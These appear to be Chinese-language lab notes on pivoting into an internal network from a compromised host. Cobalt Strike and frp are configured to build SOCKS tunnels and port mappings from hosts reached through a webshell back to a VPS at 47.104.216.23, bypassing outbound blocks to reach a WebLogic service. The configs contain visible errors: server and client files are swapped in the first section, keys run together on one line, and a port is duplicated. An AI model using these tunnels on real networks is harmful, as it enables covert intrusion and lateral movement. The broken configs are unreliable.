frp CS搭建socks隧道

kali当作客户端，vps当作服务端，webshell机器上传后门，CS上线，使用CS自带socks搭建隧道
选择socks代理

服务端启动：frps -c frpssocks.toml

serverAddr = "47.104.216.23"
serverPort = 7000[[proxies]]
name = "test-tcp"
type = "tcp"
localIP = "127.0.0.1"
localPort = 5555
remotePort = 6666

客户端启动：frpc -c frpcsocks.toml

bindPort=7000

proxifers

我们上线的是192.168.52.135
然后我们尝试访问10.10.20.12:7001端口，这里我启动了weblogic服务

访问到了说明socks隧道搭建成功

frp内网穿透搭建socks隧道（出站没限制）

使用场景：拿到了webshell但是上线不了CS（出入站阻止）要对主机的内部网络进行信息收集打点，无法采用cs上面的socks节点去操作，将frpc上传到控制机器创建socks节点
使用条件：出站没限制（相当于被控机器要访问到内部网络）

使用vps与被控机器建立socks，本机访问内部网络则通过proxy代理服务端访问内部网络，客户端访问将流量返回给服务端

服务端启动：frps -c frpssocks.toml

bindPort = 7000
bindAddr = "0.0.0.0"
allowPorts = [{start=80,end=50000}]
log.to = "/var/log/frps.log"  # 日志文件路径
log.level = "info"               # 日志级别
log.maxDays = 3
transport.maxPoolCount = 50

客户端启动：frpc -c frpcsocks.toml

serverAddr = "47.104.216.23"
serverPort = 7000
[[proxies]]
name = "socks5"
type = "tcp"
remotePort = 6000
[proxies.plugin]
type = "socks5"

端口映射

服务端启动：frps -c frps.toml

[common]
bind_port = 7000

客户端启动：frpc -c frpc.toml

serverAddr = "47.104.216.23"
serverPort = 7000
[[proxies]]
name="socks5"
type="tcp"
remotePort= 8888
localIP="10.10.20.131"
localPort=80
remotePort = 8888

被控机器(192.168.52.136)frp客户端
frp服务端（47.104.216.23）8888端口
请求47.104.216.23:8888相当于客户端（被控机器）请求192.168.52.135:80，最后流量被转发回8888端口